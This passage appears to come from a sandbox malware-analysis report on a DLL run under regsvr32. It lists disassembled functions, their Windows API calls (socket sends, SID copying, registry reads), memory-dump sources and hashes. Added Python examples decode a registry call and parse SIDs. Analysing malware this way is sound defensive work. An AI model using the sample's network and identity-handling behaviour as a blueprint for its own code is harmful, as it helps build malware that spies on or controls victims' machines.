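    return product_name   # pre-Windows 10: no CurrentMajorVersionNumber value


# Constructed inputs (not read from the sandbox host).
SAMPLE_VALUES = {
    "host A": ("Windows 10 Pro", 10, 19045),
    "host B": ("Windows 10 Pro", 10, 22631),
    "host C": ("Windows 7 Professional", None, 7601),
}

if __name__ == "__main__":
    for line in REPORT_LINES:
        c = parse_call(line)
        if c["api"].startswith("RegOpenKeyEx"):
            print(c["api"], "->", decode_regopen(c))
        elif c["api"].startswith("RegQueryValueEx"):
            print(c["api"], "-> cbData =", regquery_buffer_size(c))
    for host, vals in SAMPLE_VALUES.items():
        print(host, vals, "->", windows_release(*vals))
```

The decoded open call is read-only (KEY_READ on HKEY_LOCAL_MACHINE), so the routine only queries the host and does not modify it; the 4-byte buffer in the query is what you would expect for the REG_DWORD CurrentMajorVersionNumber read.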
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _memset$_vswprintf_s
                                                                  • String ID: D
                                                                  • API String ID: 3424173483-2746444292
                                                                  • Opcode ID: ad18f4a286e464ebda1c59b161c59facedf8c9e110f188be35c64217384010a6
                                                                  • Instruction ID: cce055b93c5e3b5d19c1b6a8023c38898461b740c9ad9fc94aa0326f359cac91
                                                                  • Opcode Fuzzy Hash: ad18f4a286e464ebda1c59b161c59facedf8c9e110f188be35c64217384010a6
                                                                  • Instruction Fuzzy Hash: 6F4179B1A40304ABE720DF70DC45FEA77B8EF54704F10459DB64DDB1C0DAB5AA858B58
                                                                  APIs
                                                                  • ___BuildCatchObject.LIBCMT ref: 04F94108
                                                                    • Part of subcall function 04F94063: ___BuildCatchObjectHelper.LIBCMT ref: 04F94099
                                                                  • _UnwindNestedFrames.LIBCMT ref: 04F9411F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3487967840-3733052814
                                                                  • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction ID: 16b4d96c52a675a85aadd7780c5692e7fe0401f071039b45db3ec49a0315aeab
                                                                  • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction Fuzzy Hash: 49012431404119BBEF236F50CC85EAA3FAAEF28344F004010BD0855120D732EDB3DBA1
                                                                  APIs
                                                                  • ___BuildCatchObject.LIBCMT ref: 02643A33
                                                                    • Part of subcall function 0264398E: ___BuildCatchObjectHelper.LIBCMT ref: 026439C4
                                                                  • _UnwindNestedFrames.LIBCMT ref: 02643A4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3487967840-3733052814
                                                                  • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction ID: c1e1e3338b0aa5e7f680adb30db70634d38d9a268732e1c677b415817df7b6e4
                                                                  • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                  • Instruction Fuzzy Hash: 5D01F27104110ABBDF12AF51CC44EEB7F6AEF18354F208159BD9815220EB32D9B1DFA4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: '$+NaNinf00e00E0assertion failed: ndigits > 0
                                                                  • API String ID: 2221118986-2653426196
                                                                  • Opcode ID: 92ce96908bd32a8c82add691a1806c5426f28ef92f7757c9edc28a6e5e88a48a
                                                                  • Instruction ID: 4695bb20287f52d6d83c17a41c1c0e6f39004dfc132f8c6acf4c7344bb48fc49
                                                                  • Opcode Fuzzy Hash: 92ce96908bd32a8c82add691a1806c5426f28ef92f7757c9edc28a6e5e88a48a
                                                                  • Instruction Fuzzy Hash: 53816272F002184BDB08CA9DDC917EEF7FAABD8354F19813AE519E7394E6749C048B90
                                                                  APIs
                                                                  • memcpy.MSVCRT(00000000,?,?,attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs,00000035,6C9785A8), ref: 6C856BD3
                                                                  Strings
                                                                  • attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs, xrefs: 6C856B36
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs
                                                                  • API String ID: 3510742995-1099963043
                                                                  • Opcode ID: df83d4c7c561ca74468cbb371acc0a9baffd7186c04f6be0f5afe545a9de0dab
                                                                  • Instruction ID: 5b799695bec4daf6d8a6aeec36873f98b06e22cfef3700667e22c57de3e8580b
                                                                  • Opcode Fuzzy Hash: df83d4c7c561ca74468cbb371acc0a9baffd7186c04f6be0f5afe545a9de0dab
                                                                  • Instruction Fuzzy Hash: 3F61CCB1E012099FDB10CF64C884BDEBBB5FF54308F144969E804AB761E7B5E914CB90
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000,?), ref: 6C8F9852
                                                                  • ReadConsoleW.KERNEL32(?,6C983DB0,00000001,00000000,?,00000000,?), ref: 6C8F9862
                                                                  • GetLastError.KERNEL32(?,6C983DB0,00000001,00000000,?,00000000,?), ref: 6C8F9872
                                                                  • GetLastError.KERNEL32(?,6C983DB0,00000001,00000000,?,00000000,?), ref: 6C8F98EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$ConsoleRead
                                                                  • String ID:
                                                                  • API String ID: 2254617233-0
                                                                  • Opcode ID: 757bcecf1848567cd3311e32bf7836a7cb0e5b38261cf695ced46d1bbe024acc
                                                                  • Instruction ID: 4d2abbe3bd0493d2d128243d6646ee9305418fefe19d3cf51f88a5f6bf36354e
                                                                  • Opcode Fuzzy Hash: 757bcecf1848567cd3311e32bf7836a7cb0e5b38261cf695ced46d1bbe024acc
                                                                  • Instruction Fuzzy Hash: 0341DF71A01219ABDF10DFA4C980BEF77B8AF55368F148869E928A7740D731E942C7A0
                                                                  APIs
                                                                  • IsValidSid.ADVAPI32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C8626E4
                                                                  • GetLengthSid.ADVAPI32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C8626EE
                                                                  • CopySid.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C862717
                                                                  • CopySid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C86274F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Copy$LengthValid
                                                                  • String ID:
                                                                  • API String ID: 3824519660-0
                                                                  • Opcode ID: 61c158add2212a1f1b8d48715ea5f2ce2968d7809c6bbe3daa0d2a8437e72cc3
                                                                  • Instruction ID: e6218f134b5073c80d8872656c5c7a3e25aaa459dff0fa4398382d80b4c4fbee
                                                                  • Opcode Fuzzy Hash: 61c158add2212a1f1b8d48715ea5f2ce2968d7809c6bbe3daa0d2a8437e72cc3
                                                                  • Instruction Fuzzy Hash: 5431D870D013086BEB309F668D88FDBBAACAF56748F104865F904ABB41D7BDC90487B5
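The function above validates a SID with IsValidSid, sizes it with GetLengthSid and duplicates it twice with CopySid. The parser below is an added example for this page, not code from the sample, that performs the same checks on the documented binary SID layout (revision byte, sub-authority count byte, 48-bit big-endian identifier authority, then 32-bit little-endian sub-authorities) and converts to and from the S-1-5-... string form. The SID byte strings it uses are constructed test vectors; the well-known LocalSystem SID is the real one, the domain SID is invented.

```python
"""Binary SID validation, sizing, copying and string conversion.

Added example for this analysis page; it is not the sample's own code.
It mirrors the contracts of IsValidSid, GetLengthSid and CopySid on the
documented SID structure. Test vectors below are constructed.
"""
import struct
from typing import Optional

SID_REVISION = 1
SID_MAX_SUB_AUTHORITIES = 15          # Win32 limit; count byte above this is invalid
SID_HEADER_LEN = 8                    # revision(1) + count(1) + identifier authority(6)


def sid_length(buf: bytes) -> int:
    """GetLengthSid: header plus 4 bytes per sub-authority, taken from the count byte."""
    return SID_HEADER_LEN + 4 * buf[1]


def is_valid_sid(buf: bytes) -> bool:
    """IsValidSid: revision must be 1 and the sub-authority count at most 15.
    Additionally require the buffer to actually contain the declared length,
    which IsValidSid cannot check but a parser working on a dump must."""
    if len(buf) < SID_HEADER_LEN:
        return False
    if buf[0] != SID_REVISION or buf[1] > SID_MAX_SUB_AUTHORITIES:
        return False
    return len(buf) >= sid_length(buf)


def copy_sid(dst_capacity: int, src: bytes) -> Optional[bytes]:
    """CopySid: copy exactly GetLengthSid(src) bytes, or fail when the
    destination is too small or the source is not a valid SID."""
    if not is_valid_sid(src):
        return None
    n = sid_length(src)
    if dst_capacity < n:
        return None
    return bytes(src[:n])


def sid_to_string(buf: bytes) -> str:
    """Binary SID to S-R-I-S... form. SDDL prints the identifier authority in
    decimal below 2**32 and as 0x-prefixed hex at or above it."""
    if not is_valid_sid(buf):
        raise ValueError("invalid SID")
    count = buf[1]
    authority = int.from_bytes(buf[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, SID_HEADER_LEN)
    auth_str = str(authority) if authority < 2 ** 32 else "0x%012X" % authority
    return "-".join(["S", str(buf[0]), auth_str] + [str(s) for s in subs])


def string_to_sid(text: str) -> bytes:
    """S-R-I-S... form back to the binary layout."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string")
    revision = int(parts[1])
    authority = int(parts[2], 0)       # accepts decimal or 0x-prefixed hex
    subs = [int(p) for p in parts[3:]]
    if revision != SID_REVISION or len(subs) > SID_MAX_SUB_AUTHORITIES:
        raise ValueError("unsupported revision or too many sub-authorities")
    if authority >= 2 ** 48:
        raise ValueError("identifier authority does not fit in 48 bits")
    out = bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
    return out + struct.pack("<%dI" % len(subs), *subs)


# Constructed vectors. LOCAL_SYSTEM is the real well-known S-1-5-18;
# DOMAIN_USER is an invented domain SID used only to exercise the code.
LOCAL_SYSTEM = bytes.fromhex("01 01 000000000005 12000000")
DOMAIN_USER = string_to_sid("S-1-5-21-1000000-2000000-3000000-1105")
BAD_REVISION = bytes.fromhex("02 01 000000000005 12000000")
TRUNCATED = bytes.fromhex("01 05 000000000005 15000000")   # claims 5 sub-authorities, has 1

if __name__ == "__main__":
    for name, sid in (("LOCAL_SYSTEM", LOCAL_SYSTEM), ("DOMAIN_USER", DOMAIN_USER)):
        print(name, sid_to_string(sid), "len", sid_length(sid))
    print("bad revision valid?", is_valid_sid(BAD_REVISION))
    print("truncated valid?", is_valid_sid(TRUNCATED))
    print("copy into 8-byte buffer:", copy_sid(8, LOCAL_SYSTEM))
```

When carving SIDs out of a memory dump such as the ones listed in this report, the truncation check matters more than it does against the live API: a count byte of 5 in a region that only holds one sub-authority would otherwise make the parser read past the object.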
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 3556499859-0
                                                                  • Opcode ID: d640f9d809ed10fef1b179c7ca3851c6ae2fcadbee8e3c97a246e8732f721754
                                                                  • Instruction ID: dafdc9d521e7f201b7e22fcafba7dcc72392ee848bf34c0304d981940063f74e
                                                                  • Opcode Fuzzy Hash: d640f9d809ed10fef1b179c7ca3851c6ae2fcadbee8e3c97a246e8732f721754
                                                                  • Instruction Fuzzy Hash: BA315E31D40715FFDB21AFB5FD48AD63EA2EB84368754853BE404962B0EB74A4428F98
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0263E499
                                                                  • __isleadbyte_l.LIBCMT ref: 0263E4CC
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0264AB6C,?,02645314,00000000,?,?,?,?,0264AB6C,02645314), ref: 0263E4FD
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0264AB6C,00000001,02645314,00000000,?,?,?,?,0264AB6C,02645314), ref: 0263E56B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 21a4a99c86c4800d9144e16af24a0218dfe942ac3b88dbf7f893ab931b26a57b
                                                                  • Instruction ID: c09561808c29b949a53b95123f8d7b15738eb9b890150ad9bd1105acdf14c9e2
                                                                  • Opcode Fuzzy Hash: 21a4a99c86c4800d9144e16af24a0218dfe942ac3b88dbf7f893ab931b26a57b
                                                                  • Instruction Fuzzy Hash: C431C532A00256EFDF12DF64C884ABD3BB5FF09325F148569E4659B292E333D940CBA0
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 0263443E
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0263444D
                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 0263449B
                                                                    • Part of subcall function 02633F50: GetCurrentThreadId.KERNEL32 ref: 02633F55
                                                                    • Part of subcall function 02633F50: send.WS2_32(?,02647440,00000010,00000000), ref: 02633FB6
                                                                    • Part of subcall function 02633F50: SetEvent.KERNEL32(?), ref: 02633FD9
                                                                    • Part of subcall function 02633F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02633FE5
                                                                    • Part of subcall function 02633F50: WSACloseEvent.WS2_32(?), ref: 02633FF3
                                                                    • Part of subcall function 02633F50: shutdown.WS2_32(?,00000001), ref: 0263400B
                                                                    • Part of subcall function 02633F50: closesocket.WS2_32(?), ref: 02634015
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                  • String ID:
                                                                  • API String ID: 4080316033-0
                                                                  • Opcode ID: 63f5b9e45fe0e2f7b75d6c17ba27ad0f3dddf59e740b33155e987a95ce264ae6
                                                                  • Instruction ID: 0f7856b82a766312c09f535632fd547063a02d85f99d391e376b6f36bd381897
                                                                  • Opcode Fuzzy Hash: 63f5b9e45fe0e2f7b75d6c17ba27ad0f3dddf59e740b33155e987a95ce264ae6
                                                                  • Instruction Fuzzy Hash: 6B216F766407046BD330EF69DC84B9BF3E8EF99720F500A1EE58AC7640DB71B4548BA5
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000139F), ref: 026343DC
                                                                    • Part of subcall function 026313A0: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 026313CB
                                                                    • Part of subcall function 026341D0: RtlEnterCriticalSection.NTDLL(02634FA5), ref: 026341D8
                                                                    • Part of subcall function 026341D0: RtlLeaveCriticalSection.NTDLL(02634FA5), ref: 026341E6
                                                                    • Part of subcall function 02634C60: HeapFree.KERNEL32(?,00000000,?,00000000,02634E45,?,026342B8,02634E45,00000000,?,?,02634E45,?), ref: 02634C87
                                                                  • SetLastError.KERNEL32(00000000,?), ref: 026343C7
                                                                  • SetLastError.KERNEL32(00000057), ref: 026343F1
                                                                  • WSAGetLastError.WS2_32(?), ref: 02634400
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CriticalHeapSection$AllocateEnterFreeLeave
                                                                  • String ID:
                                                                  • API String ID: 2160363220-0
                                                                  • Opcode ID: ea5523d5e75e48e808edcaabeda5bf16bfdb69450dfdea360075c6ad1e475f0d
                                                                  • Instruction ID: 571e0046f3837e7e1a6a8ef32fb7a9e2e99fb56b056871a60fed2263f083d836
                                                                  • Opcode Fuzzy Hash: ea5523d5e75e48e808edcaabeda5bf16bfdb69450dfdea360075c6ad1e475f0d
                                                                  • Instruction Fuzzy Hash: ED11063BA0612C9B9B11EE69B8845EEF7A8EF85732B0445AAED0DE7300DB359D1146D0
                                                                  APIs
                                                                  • WSAEventSelect.WS2_32(02633A9B,00000001,00000023), ref: 02633BE2
                                                                  • WSAGetLastError.WS2_32 ref: 02633BED
                                                                  • send.WS2_32(00000001,00000000,00000000,00000000), ref: 02633C38
                                                                  • WSAGetLastError.WS2_32 ref: 02633C43
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EventSelectsend
                                                                  • String ID:
                                                                  • API String ID: 259408233-0
                                                                  • Opcode ID: 52cb1a8313e9e950cfd4b8a74bdd093a5d46de6401d690088f169c9e091d2718
                                                                  • Instruction ID: 96dfd70249ebf569e2660ead0fff27ecc86ca5e7a6b3249c063b319986388cae
                                                                  • Opcode Fuzzy Hash: 52cb1a8313e9e950cfd4b8a74bdd093a5d46de6401d690088f169c9e091d2718
                                                                  • Instruction Fuzzy Hash: 2711A3B66017009BD3209F79D8C8A4BB7FAFB88710F404A1EEA97C7740C770E8508B50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction ID: 158e06f604da39282f6583820bdd484f33028747e187cb05c89b6616bfe7e8bb
                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction Fuzzy Hash: 4B11393241014EBFCF126F84CC55CEE3F62BB1D364B598519FA185A030D336E5B2ABA2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction ID: 3e55a16c715ef2e61582b37800e6019264206480185364ff1b609aa777d2d3f5
                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                  • Instruction Fuzzy Hash: 2111693680014ABBDF175E95CC418EE3F62BF08254F088818FA1898520C33AC9B2AB81
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 04F8E0DF
                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __amsg_exit.LIBCMT ref: 04F8E0FF
                                                                  • __lock.LIBCMT ref: 04F8E10F
                                                                  • _free.LIBCMT ref: 04F8E13F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 3170801528-0
                                                                  • Opcode ID: 4cf3b957dde3def4c87ddc975d8c81450a738a2aaffde9ec79113fff7239d67b
                                                                  • Instruction ID: 3c47dccc420d0ce5629cfe8e140378a2425521d5579a7518170cec22806cc873
                                                                  • Opcode Fuzzy Hash: 4cf3b957dde3def4c87ddc975d8c81450a738a2aaffde9ec79113fff7239d67b
                                                                  • Instruction Fuzzy Hash: 6E014032E04A119BEB11BB649C087DEB7A1BF04754F14801EE811EF690DB347983DBD5
                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(02634FA5), ref: 026341D8
                                                                  • RtlLeaveCriticalSection.NTDLL(02634FA5), ref: 026341E6
                                                                  • RtlLeaveCriticalSection.NTDLL(02634FA5), ref: 02634247
                                                                  • SetEvent.KERNEL32(8520468B), ref: 02634262
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$EnterEvent
                                                                  • String ID:
                                                                  • API String ID: 3394196147-0
                                                                  • Opcode ID: 8438a2a2d9813f7413cdde15393eb1e0696155f3e3572684d148a6ad721bcda9
                                                                  • Instruction ID: ae53d931d87e9ad1a403992ba7ff3d6b46c4e9fc985e337cb2ee9a38d9e900f5
                                                                  • Opcode Fuzzy Hash: 8438a2a2d9813f7413cdde15393eb1e0696155f3e3572684d148a6ad721bcda9
                                                                  • Instruction Fuzzy Hash: AA1103B8A01B009FD725CF74C584ADAB7E9BF48301B54892DE49E87200EB30E841CB40
                                                                  APIs
                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02633647
                                                                  • _free.LIBCMT ref: 0263367C
                                                                    • Part of subcall function 02637009: HeapFree.KERNEL32(00000000,00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B), ref: 0263701F
                                                                    • Part of subcall function 02637009: GetLastError.KERNEL32(00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B,?), ref: 02637031
                                                                  • _malloc.LIBCMT ref: 026336B7
                                                                  • _memset.LIBCMT ref: 026336C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                  • String ID:
                                                                  • API String ID: 3340475617-0
                                                                  • Opcode ID: 0eafc0aa7e5a22e6a4f0b0f493d649c87a5c4448f5ccb4ca4b73956a8532d84e
                                                                  • Instruction ID: 57deae51fb2a51b8ef79e54f5eabd8bf38505f4da3443d41aae64556c27f6d07
                                                                  • Opcode Fuzzy Hash: 0eafc0aa7e5a22e6a4f0b0f493d649c87a5c4448f5ccb4ca4b73956a8532d84e
                                                                  • Instruction Fuzzy Hash: 9E01D6F5900B44DFE3619F7A9881B97FAE9EB85314F104C2EE5AE83302D734A8048F60
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 04F877C6
                                                                    • Part of subcall function 04F87718: __FF_MSGBANNER.LIBCMT ref: 04F87731
